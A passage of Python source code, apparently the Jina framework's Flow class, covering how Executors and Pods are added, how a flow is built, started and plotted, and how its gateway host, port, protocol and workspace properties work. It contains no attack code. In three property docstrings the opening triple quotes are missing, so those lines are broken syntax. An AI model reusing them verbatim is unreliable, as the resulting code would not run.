log_config: Optional[str] = None,
name: Optional[str] = None,
native: Optional[bool] = False,
polling: Optional[str] = 'ANY',
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'WorkerRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_after_address: Optional[str] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connection_list: dictionary JSON with a list of connections to configure
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true basically tells the Pea not to wait on the Runtime when closing
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to the Docker SDK when starting the docker
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in the Docker image. When not set, the Docker image ENTRYPOINT takes effect.
:param env: The map of environment variables that are available inside runtime
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows accessing under the same network/subnet. It is important to set this to true when the Pea will receive input connections from remote Peas
:param external: The Pod will be considered an external Pod that has been started independently from the Flow. This Pod will not be context managed by the Flow.
:param force_update: If set, always pull the latest Hub Executor bundle even if it exists locally
:param gpus: This argument allows a dockerized Jina Executor to discover local GPU devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display`
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors are allowed, and the Executor is always run inside WorkerRuntime.
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port_in: The port for input data to bind to, by default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules that need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds that a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only a flattened structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor; it can be one of the following:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When used under Python, the following values can be used additionally:
- a Python dict that represents the config
- a text file stream that has a `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
:param uses_after_address: The address of the uses-after runtime
:param uses_before: The executor attached before the Peas described by --uses, typically used before sending to all shards, accepted type follows `--uses`
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split is provided, then the basename of that directory will be mounted into the container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:return: a (new) Flow object with modification
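Example, a sketch of the most common ``uses`` values (the YAML file ``my_exec.yml`` and the Hub name ``MyHubExecutor`` are hypothetical placeholders):
.. highlight:: python
.. code-block:: python
from jina import Flow
# one Executor from a local YAML config, one from Jina Hub,
# with its `with` configuration overridden at add-time
f = Flow().add(uses='my_exec.yml', name='local_exec')
f = f.add(uses='jinahub+docker://MyHubExecutor', uses_with={'param': 1}, name='hub_exec')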
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
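Example, a sketch of wiring topology via ``needs`` (the Pod names are hypothetical):
.. highlight:: python
.. code-block:: python
from jina import Flow
# p2 receives from p1 (the last added Pod by default), p3 receives from the gateway
f = Flow().add(name='p1').add(name='p2').add(name='p3', needs='gateway')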
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'executor{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.noblock_on_start = True
args.extra_search_paths = self.args.extra_search_paths
port_in = kwargs.get('port_in', None)
if not port_in:
port_in = helper.random_port()
args.port_in = port_in
op_flow._pod_nodes[pod_name] = Pod(args, needs)
op_flow.last_pod = pod_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
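Example, a sketch that hangs a hypothetical evaluator off the last Pod without touching the main data path (``my_evaluator.yml`` is an assumed Executor config):
.. highlight:: python
.. code-block:: python
from jina import Flow
# the inspect Pod runs `my_evaluator.yml`, the auxiliary pass-through keeps the original route intact
f = Flow().add(name='encoder').inspect(name='evaluate', uses='my_evaluator.yml')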
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
) -> 'Flow':
"""Gather all inspect Pods output into one Pod. When the Flow has no inspect Pod then the Flow itself
is returned.
.. note::
If ``--no-inspect`` is **not** given, then :meth:`gather_inspect` is auto called before :meth:`build`. So
in general you don't need to manually call :meth:`gather_inspect`.
:param name: the name of the gather Pod
:param include_last_pod: whether to include the last modified Pod in the Flow
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the modified Flow or the copy of it
.. seealso::
:meth:`inspect`
"""
needs = [k for k, v in self._pod_nodes.items() if v.role == PodRoleType.INSPECT]
if needs:
if include_last_pod:
needs.append(self.last_pod)
return self.add(
name=name,
needs=needs,
pod_role=PodRoleType.JOIN_INSPECT,
*args,
**kwargs,
)
else:
# no inspect node is in the graph, return the current graph
return self
def _get_gateway_target(self, prefix):
gateway_pod = self._pod_nodes[GATEWAY_NAME]
return (
f'{prefix}-{GATEWAY_NAME}',
{
'host': gateway_pod.head_host,
'port': gateway_pod.head_port_in,
'expected_parts': 0,
},
)
@allowed_levels([FlowBuildLevel.EMPTY])
def build(self, copy_flow: bool = False) -> 'Flow':
"""
Build the current Flow and make it ready to use
.. note::
No need to manually call it since 0.0.8. When using Flow with the
context manager, or using :meth:`start`, :meth:`build` will be invoked.
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:return: the current Flow (by default)
.. note::
``copy_flow=True`` is recommended if you are building the same Flow multiple times in a row. e.g.
.. highlight:: python
.. code-block:: python
f = Flow()
with f:
f.index()
with f.build(copy_flow=True) as fl:
fl.search()
.. # noqa: DAR401
"""
op_flow = copy.deepcopy(self) if copy_flow else self
if op_flow.args.inspect == FlowInspectType.COLLECT:
op_flow.gather_inspect(copy_flow=False)
if GATEWAY_NAME not in op_flow._pod_nodes:
op_flow._add_gateway(
needs={op_flow.last_pod},
graph_description=op_flow._get_graph_representation(),
pod_addresses=op_flow._get_pod_addresses(),
)
removed_pods = []
# if set no_inspect then all inspect related nodes are removed
if op_flow.args.inspect == FlowInspectType.REMOVE:
filtered_pod_nodes = OrderedDict()
for k, v in op_flow._pod_nodes.items():
if not v.role.is_inspect:
filtered_pod_nodes[k] = v
else:
removed_pods.append(v.name)
op_flow._pod_nodes = filtered_pod_nodes
reverse_inspect_map = {v: k for k, v in op_flow._inspect_pods.items()}
while (
len(op_flow._last_changed_pod) > 0
and len(removed_pods) > 0
and op_flow.last_pod in removed_pods
):
op_flow._last_changed_pod.pop()
for end, pod in op_flow._pod_nodes.items():
# if an endpoint is being inspected, then replace it with inspected Pod
# but not those inspect related node
if op_flow.args.inspect.is_keep:
pod.needs = set(
ep if pod.role.is_inspect else op_flow._inspect_pods.get(ep, ep)
for ep in pod.needs
)
else:
pod.needs = set(reverse_inspect_map.get(ep, ep) for ep in pod.needs)
hanging_pods = _hanging_pods(op_flow)
if hanging_pods:
op_flow.logger.warning(
f'{hanging_pods} are hanging in this flow with no pod receiving from them, '
f'you may want to double-check whether this is intentional or a mistake'
)
op_flow._build_level = FlowBuildLevel.GRAPH
if len(removed_pods) > 0:
# very dirty
op_flow._pod_nodes[GATEWAY_NAME].args.graph_description = json.dumps(
op_flow._get_graph_representation()
)
op_flow._pod_nodes[GATEWAY_NAME].args.pod_addresses = json.dumps(
op_flow._get_pod_addresses()
)
op_flow._pod_nodes[GATEWAY_NAME].update_pea_args()
return op_flow
def __call__(self, *args, **kwargs):
"""Builds the Flow
:param args: args for build
:param kwargs: kwargs for build
:return: the built Flow
"""
return self.build(*args, **kwargs)
def __enter__(self):
with CatchAllCleanupContextManager(self):
return self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
if hasattr(self, '_stop_event'):
self._stop_event.set()
super().__exit__(exc_type, exc_val, exc_tb)
# unset all envs to avoid any side-effect
if self.args.env:
for k in self.args.env.keys():
os.environ.pop(k, None)
# do not know why but removing these 2 lines makes 2 tests fail
if GATEWAY_NAME in self._pod_nodes:
self._pod_nodes.pop(GATEWAY_NAME)
self._build_level = FlowBuildLevel.EMPTY
self.logger.debug('Flow is closed!')
self.logger.close()
def start(self):
"""Start to run all Pods in this Flow.
Remember to close the Flow with :meth:`close`.
Note that this method has a timeout of ``timeout_ready`` set in CLI,
which is inherited all the way from :class:`jina.peapods.peas.Pea`
.. # noqa: DAR401
:return: this instance
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
self.build(copy_flow=False)
# set env only before the Pod get started
if self.args.env:
for k, v in self.args.env.items():
os.environ[k] = str(v)
for k, v in self:
if not v.external:
self.enter_context(v)
self._wait_until_all_ready()
self._build_level = FlowBuildLevel.RUNNING
return self
def _wait_until_all_ready(self):
results = {}
threads = []
def _wait_ready(_pod_name, _pod):
try:
if not _pod.external:
results[_pod_name] = 'pending'
_pod.wait_start_success()
results[_pod_name] = 'done'
except Exception as ex:
results[_pod_name] = repr(ex)
def _polling_status():
spinner = itertools.cycle(
['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
)
while True:
num_all = len(results)
num_done = 0
pendings = []
for _k, _v in results.items():
sys.stdout.flush()
if _v == 'pending':
pendings.append(_k)
else:
num_done += 1
sys.stdout.write('\r{}\r'.format(' ' * 100))
pending_str = colored(' '.join(pendings)[:50], 'yellow')
sys.stdout.write(
f'{colored(next(spinner), "green")} {num_done}/{num_all} waiting {pending_str} to be ready...'
)
sys.stdout.flush()
if not pendings:
sys.stdout.write('\r{}\r'.format(' ' * 100))
break
time.sleep(0.1)
# kick off all pods wait-ready threads
for k, v in self:
t = threading.Thread(
target=_wait_ready,
args=(
k,
v,
),
daemon=True,
)
threads.append(t)
t.start()
# kick off spinner thread
t_m = threading.Thread(target=_polling_status, daemon=True)
t_m.start()
# kick off ip getter thread
addr_table = []
t_ip = threading.Thread(
target=self._get_address_table, args=(addr_table,), daemon=True
)
t_ip.start()
for t in threads:
t.join()
if t_ip is not None:
t_ip.join()
t_m.join()
error_pods = [k for k, v in results.items() if v != 'done']
if error_pods:
self.logger.error(
f'Flow is aborted because {error_pods} can not be started.'
)
self.close()
raise RuntimeFailToStart
else:
success_msg = colored('🎉 Flow is ready to use!', 'green')
if addr_table:
self.logger.info(success_msg + '\n' + '\n'.join(addr_table))
self.logger.debug(
f'{self.num_pods} Pods (i.e. {self.num_peas} Peas) are running in this Flow'
)
@property
def num_pods(self) -> int:
"""Get the number of Pods in this Flow
.. # noqa: DAR201"""
return len(self._pod_nodes)
@property
def num_peas(self) -> int:
Get the total number of Peas (across all Pods and their shards) in this Flow
.. # noqa: DAR201"""
return sum(v.num_peas for v in self._pod_nodes.values())
def __eq__(self, other: 'Flow') -> bool:
"""
Compare the topology of a Flow with another Flow.
Equality is defined by whether two Flows share the same set of edges.
:param other: the second Flow object
:return: result of equality check
"""
if self._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow = copy.deepcopy(self)
a = op_flow.build()
else:
a = self
if other._build_level.value < FlowBuildLevel.GRAPH.value:
op_flow_b = copy.deepcopy(other)
b = op_flow_b.build()
else:
b = other
return a._pod_nodes == b._pod_nodes
@property
def client(self) -> 'BaseClient':
"""Return a :class:`BaseClient` object attach to this Flow.
.. # noqa: DAR201"""
kwargs = dict(
host=self.host,
port=self.port_expose,
protocol=self.protocol,
results_as_docarray=True,
)
kwargs.update(self._common_kwargs)
return Client(**kwargs)
@property
def _mermaid_str(self):
mermaid_graph = [
'''
%%{init:{
"theme": "base",
"themeVariables": {
"primaryColor": "#fff",
"primaryBorderColor": "#fff",
"mainBkg": "#32C8CD",
"clusterBkg": "#EEEDE78C",
"secondaryBorderColor": "none",
"tertiaryBorderColor": "none",
"lineColor": "#a6d8da"
}
}}%%
'''.replace(
'\n', ''
),
'flowchart LR;',
]
pod_nodes = []
# plot subgraphs
for node, v in self._pod_nodes.items():
pod_nodes.append(v.name)
mermaid_graph.extend(v._mermaid_str)
for node, v in self._pod_nodes.items():
for need in sorted(v.needs):
need_print = need
if need == 'gateway':
need_print = 'gatewaystart[gateway]'
node_print = node
if node == 'gateway':
node_print = 'gatewayend[gateway]'
_s_role = self._pod_nodes[need].role
_e_role = self._pod_nodes[node].role
if self._pod_nodes[need].external:
_s_role = 'EXTERNAL'
if self._pod_nodes[node].external:
_e_role = 'EXTERNAL'
line_st = '-->'
if _s_role == PodRoleType.INSPECT or _e_role == PodRoleType.INSPECT:
line_st = '-.->'
mermaid_graph.append(
f'{need_print}:::{str(_s_role)} {line_st} {node_print}:::{str(_e_role)};'
)
mermaid_graph.append(f'classDef {str(PodRoleType.INSPECT)} stroke:#F29C9F')
mermaid_graph.append(f'classDef {str(PodRoleType.JOIN_INSPECT)} stroke:#F29C9F')
mermaid_graph.append(
f'classDef {str(PodRoleType.GATEWAY)} fill:none,color:#000,stroke:none'
)
mermaid_graph.append(
f'classDef {str(PodRoleType.INSPECT_AUX_PASS)} stroke-dasharray: 2 2'
)
mermaid_graph.append(f'classDef HEADTAIL fill:#32C8CD1D')
mermaid_graph.append(f'\nclassDef EXTERNAL fill:#fff,stroke:#32C8CD')
return '\n'.join(mermaid_graph)
def plot(
self,
output: Optional[str] = None,
vertical_layout: bool = False,
inline_display: bool = False,
build: bool = True,
copy_flow: bool = True,
) -> 'Flow':
"""
Visualize the Flow up to the current point
If a file name is provided it will create a jpg image with that name,
otherwise it will display the URL for mermaid.
If called within IPython notebook, it will be rendered inline,
otherwise an image will be created.
Example,
.. highlight:: python
.. code-block:: python
flow = Flow().add(name='pod_a').plot('flow.svg')
:param output: a filename specifying the name of the image to be created,
the suffix svg/jpg determines the file type of the output image
:param vertical_layout: top-down or left-right layout
:param inline_display: show image directly inside the Jupyter Notebook
:param build: build the Flow first before plotting so that the gateway connection can be shown properly
:param copy_flow: when set to true, then always copy the current Flow and
do the modification on top of it then return, otherwise, do in-line modification
:return: the Flow
"""
# deepcopy causes the below error while reusing a Flow in Jupyter
# 'Pickling an AuthenticationString object is disallowed for security reasons'
op_flow = copy.deepcopy(self) if copy_flow else self
if build:
op_flow.build(False)
mermaid_str = op_flow._mermaid_str
if vertical_layout:
mermaid_str = mermaid_str.replace('flowchart LR', 'flowchart TD')
image_type = 'svg'
if output and not output.endswith('svg'):
image_type = 'img'
url = op_flow._mermaid_to_url(mermaid_str, image_type)
showed = False
if inline_display:
try:
from IPython.display import display, Image
display(Image(url=url))
showed = True
except:
# no need to panic users
pass
if output:
download_mermaid_url(url, output)
elif not showed:
op_flow.logger.info(f'flow visualization: {url}')
return self
def _ipython_display_(self):
"""Displays the object in IPython as a side effect"""
self.plot(
inline_display=True, build=(self._build_level != FlowBuildLevel.GRAPH)
)
def _mermaid_to_url(self, mermaid_str: str, img_type: str) -> str:
"""
Render the current Flow as a URL that points to an SVG. It requires an internet connection.
:param mermaid_str: the mermaid representation
:param img_type: image type (svg/jpg)
:return: the URL that points to the SVG
"""
encoded_str = base64.b64encode(bytes(mermaid_str, 'utf-8')).decode('utf-8')
return f'https://mermaid.ink/{img_type}/{encoded_str}'
@property
def port_expose(self) -> int:
"""Return the exposed port of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].args.port_expose
else:
return self._common_kwargs.get('port_expose', None)
@port_expose.setter
def port_expose(self, value: int):
"""Set the new exposed port of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['port_expose'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.port_expose = self._common_kwargs['port_expose']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def host(self) -> str:
"""Return the local address of the gateway
.. # noqa: DAR201
"""
if GATEWAY_NAME in self._pod_nodes:
return self._pod_nodes[GATEWAY_NAME].host
else:
return self._common_kwargs.get('host', __default_host__)
@host.setter
def host(self, value: str):
"""Set the new host of the Flow (affects Gateway and Client)
:param value: the new port to expose
"""
self._common_kwargs['host'] = value
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.host = self._common_kwargs['host']
# Flow is running already, then close the existing gateway
if self._build_level >= FlowBuildLevel.RUNNING:
self[GATEWAY_NAME].close()
self.enter_context(self[GATEWAY_NAME])
self[GATEWAY_NAME].wait_start_success()
@property
def address_private(self) -> str:
Return the private IP address of the gateway for connecting from other machines in the same network
.. # noqa: DAR201"""
return get_internal_ip()
@property
def address_public(self) -> str:
Return the public IP address of the gateway for connecting from other machines in the public network
.. # noqa: DAR201"""
return get_public_ip()
def __iter__(self):
return self._pod_nodes.items().__iter__()
def _get_address_table(self, address_table):
address_table.extend(
[
f'\t🔗 Protocol: \t\t{colored(self.protocol, attrs="bold")}',
f'\t🏠 Local access:\t'
+ colored(f'{self.host}:{self.port_expose}', 'cyan', attrs='underline'),
f'\t🔒 Private network:\t'
+ colored(
f'{self.address_private}:{self.port_expose}',
'cyan',
attrs='underline',
),
]
)
if self.address_public:
address_table.append(
f'\t🌐 Public address:\t'
+ colored(
f'{self.address_public}:{self.port_expose}',
'cyan',
attrs='underline',
)
)
if self.protocol == GatewayProtocolType.HTTP:
address_table.append(
f'\t💬 Swagger UI:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/docs',
'cyan',
attrs='underline',
)
)
address_table.append(
f'\t📚 Redoc:\t\t'
+ colored(
f'http://localhost:{self.port_expose}/redoc',
'cyan',
attrs='underline',
)
)
return address_table
def block(
self, stop_event: Optional[Union[threading.Event, multiprocessing.Event]] = None
):
"""Block the Flow until `stop_event` is set or user hits KeyboardInterrupt
:param stop_event: a threading event or a multiprocessing event that, once set, will return control of the Flow
to the main thread.
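Example, the typical serving pattern, blocking until Ctrl-C or until another thread sets the event (protocol and port values are illustrative):
.. highlight:: python
.. code-block:: python
from jina import Flow
f = Flow(protocol='http', port_expose=12345).add(name='encoder')
with f:
    f.block()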
"""
try:
if stop_event is None:
self._stop_event = (
threading.Event()
) #: this allows `.close` to close the Flow from another thread/proc
self._stop_event.wait()
else:
stop_event.wait()
except KeyboardInterrupt:
pass
@property
def protocol(self) -> GatewayProtocolType:
"""Return the protocol of this Flow
:return: the protocol of this Flow
"""
v = self._common_kwargs.get('protocol', GatewayProtocolType.GRPC)
if isinstance(v, str):
v = GatewayProtocolType.from_string(v)
return v
@protocol.setter
def protocol(self, value: Union[str, GatewayProtocolType]):
"""Set the protocol of this Flow, can only be set before the Flow has been started
:param value: the protocol to set
"""
# Flow is running already, protocol can't be changed anymore
if self._build_level >= FlowBuildLevel.RUNNING:
raise RuntimeError('Protocol can not be changed after the Flow has started')
if isinstance(value, str):
self._common_kwargs['protocol'] = GatewayProtocolType.from_string(value)
elif isinstance(value, GatewayProtocolType):
self._common_kwargs['protocol'] = value
else:
raise TypeError(f'{value} must be either `str` or `GatewayProtocolType`')
# Flow is build to graph already
if self._build_level >= FlowBuildLevel.GRAPH:
self[GATEWAY_NAME].args.protocol = self._common_kwargs['protocol']
def __getitem__(self, item):
if isinstance(item, str):
return self._pod_nodes[item]
elif isinstance(item, int):
return list(self._pod_nodes.values())[item]
else:
raise TypeError(f'{typename(item)} is not supported')
@property
def workspace(self) -> str:
"""Return the workspace path of the flow.
.. # noqa: DAR201"""
return os.path.abspath(self.args.workspace or './')
@workspace.setter
def workspace(self, value: str):
"""set workspace dir for flow & all pods
:param value: workspace to be set
"""
self.args.workspace = value
for k, p in self:
p.args.workspace = value
p.update_pea_args()
@property
def workspace_id(self) -> Dict[str, str]:
"""Get all Pods' ``workspace_id`` values in a dict
.. # noqa: DAR201"""
return {
k: p.args.workspace_id for k, p in self if hasattr(p.args, 'workspace_id')
}
@workspace_id.setter
def workspace_id(self, value: str):
"""Set all Pods' ``workspace_id`` to ``value``
:param value: a hexadecimal UUID string
"""
uuid.UUID(value)
for k, p in self:
if hasattr(p.args, 'workspace_id'):
p.args.workspace_id = value
args = getattr(p, 'peas_args', getattr(p, 'shards_args', None))
if args is None:
raise ValueError(
f'could not find "peas_args" or "shards_args" on {p}'
)
values = None
if isinstance(args, dict):
values = args.values()
elif isinstance(args, list):
values = args
for v in values:
if v and isinstance(v, argparse.Namespace):
v.workspace_id = value
if v and isinstance(v, List):
for i in v:
i.workspace_id = value
@property
def env(self) -> Optional[Dict]:
"""Get all envs to be set in the Flow
:return: envs as dict
"""
return self.args.env
@env.setter
def env(self, value: Dict[str, str]):
"""set env vars for flow & all pods.
This can be used by jinad to set envs for Flow and all child objects
:param value: value to be set
"""
self.args.env = value
for k, v in self:
v.args.env = value
@overload
def expose_endpoint(self, exec_endpoint: str, path: Optional[str] = None):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
:param path: the HTTP endpoint string, when not given, it is `exec_endpoint`
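Example, a sketch (assuming the Executor in the hypothetical ``my_exec.yml`` defines ``@requests(on='/foo')``):
.. highlight:: python
.. code-block:: python
from jina import Flow
f = Flow(protocol='http').add(uses='my_exec.yml')
f.expose_endpoint('/foo')
with f:
    f.block()  # `/foo` is now reachable over HTTP on the exposed port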
"""
...
@overload
def expose_endpoint(
self,
exec_endpoint: str,
*,
path: Optional[str] = None,
status_code: int = 200,
tags: Optional[List[str]] = None,
summary: Optional[str] = None,
description: Optional[str] = None,
response_description: str = 'Successful Response',
deprecated: Optional[bool] = None,
methods: Optional[List[str]] = None,
operation_id: Optional[str] = None,
response_model_by_alias: bool = True,
response_model_exclude_unset: bool = False,
response_model_exclude_defaults: bool = False,
response_model_exclude_none: bool = False,
include_in_schema: bool = True,
name: Optional[str] = None,
):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
Use this method to specify your HTTP endpoint with richer semantic and schema.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
"""
...
def expose_endpoint(self, exec_endpoint: str, **kwargs):
"""Expose an Executor's endpoint (defined by `@requests(on=...)`) to HTTP endpoint for easier access.
After expose, you can send data request directly to `http://hostname:port/endpoint`.
:param exec_endpoint: the endpoint string, by convention starts with `/`
# noqa: DAR101
# noqa: DAR102
"""
self._endpoints_mapping[exec_endpoint] = kwargs
# for backward support
join = needs
def rolling_update(
self,
pod_name: str,
uses_with: Optional[Dict] = None,
):
"""
Reload all replicas of a pod sequentially
:param pod_name: pod to update
:param uses_with: a Dictionary of arguments to restart the executor with
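Example, a sketch of restarting all replicas of a running Pod with new ``with`` arguments (the Pod name, config file and parameter values are hypothetical):
.. highlight:: python
.. code-block:: python
from jina import Flow
f = Flow().add(name='encoder', replicas=2, uses='my_exec.yml')
with f:
    # replicas of `encoder` are reloaded one by one with the new parameter
    f.rolling_update(pod_name='encoder', uses_with={'model_name': 'new-model'})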
"""
from jina.helper import run_async
run_async(
